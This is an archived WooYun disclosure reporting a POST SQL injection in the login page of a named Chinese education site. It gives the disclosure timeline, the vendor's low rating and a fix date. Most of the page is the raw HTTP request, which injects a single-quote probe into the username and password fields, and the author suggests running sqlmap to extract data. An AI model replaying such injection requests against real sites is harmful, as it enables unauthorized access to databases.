乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-11: 细节已通知厂商并且等待厂商处理中 2015-10-12: 厂商已经确认,细节仅向厂商公开 2015-10-22: 细节向核心白帽子及相关领域专家公开 2015-11-01: 细节向普通白帽子公开 2015-11-10: 厂商已经修复漏洞并主动公开,细节向公众公开
最近发现奥鹏教育的站挖洞的人很火,我也来凑个热闹http://hanbanoa.open.com.cn/Login.aspx 登录 用户名导致POST 注入
OST /Login.aspx HTTP/1.1Host: hanbanoa.open.com.cnProxy-Connection: keep-aliveContent-Length: 678Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://hanbanoa.open.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: http://hanbanoa.open.com.cn/Login.aspxAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: b_t_s_100004=16092781-5952-42a9-83c3-e608d3578e02; up_first_date=2015-08-30; up_beacon_user_id_100004= b_t_s_100200=594e3550-c7be-48bd-8282-a17e2003fc5c; b_t_s_100201=3da32262-bb9f-4e8c-ac0f-3db523e62d6d; b_t_s_100100=4cf0ee6e-8783-42f6-a373-90710386ad54; b_t_s_100103=5e87d33c-41e1-4110-9aa6-60914c0fa6cd; b_t_s=t241814798967x; up_beacon_user_id_100200= up_beacon_user_id_100201= __utma=238318431.22661185.1441815461.1441815461.1441816034.2; __utmz=238318431.1441816034.2.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; b_t_s_100001=1e438e61-331b-4985-bf39-b9c606606dfe; Hm_lvt_e208d74b7fc93539fb0706a17abb4f67=1440906334,1441817766; b_t_s_100204=9964c247-ca3d-4d72-8b51-c5a875d1b2a9; up_beacon_id_100204=9964c247-ca3d-4d72-8b51-c5a875d1b2a9-1444131812420; up_page_stime_100204=1444131822891; up_beacon_vist_count_100204=6; up_beacon_user_id_100204=; ASP.NET_SessionId=vtj5gpydldpvfmjfbv454brd__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTczODgwNjM5MQ9kFgICAw9kFgICBQ9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAmYPZBYCAgIPZBYCAgEPZBYCZg9kFgYCBQ88KwAGAQAPFgIeBVZhbHVlBRNhZG1pbicgb3IgJzEnPScxJy0tZGQCCQ88KwAGAQAPFgIfAAUTYWRtaW4nIG9yICcxJz0nMSctLWRkAg0PPCsABgEADxYCHwAFBjgyNjk4MmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBRhBU1B4Um91bmRQYW5lbDEkYnRuTG9naW5zFWDeXnnQ5XXoLF6fIC0XK63B3SBx14EauQvnZPKvHw%3D%3D&ASPxRoundPanel1_tbLoginName_Raw=1%27&ASPxRoundPanel1%24tbLoginName=1%27&ASPxRoundPanel1%24tbPassword=1%27&ASPxRoundPanel1_txtCheckCode_Raw=370436&ASPxRoundPanel1%24txtCheckCode=370436&ASPxRoundPanel1%24btnLogin=&DXScript=1_145%2C1_81%2C1_99%2C1_106%2C1_137%2C1_92
利用SQLMAP可以跑出很多东东哦
你们比我更专业
危害等级:低
漏洞Rank:3
确认时间:2015-10-12 10:19
对外测试环境
2015-11-10:已修复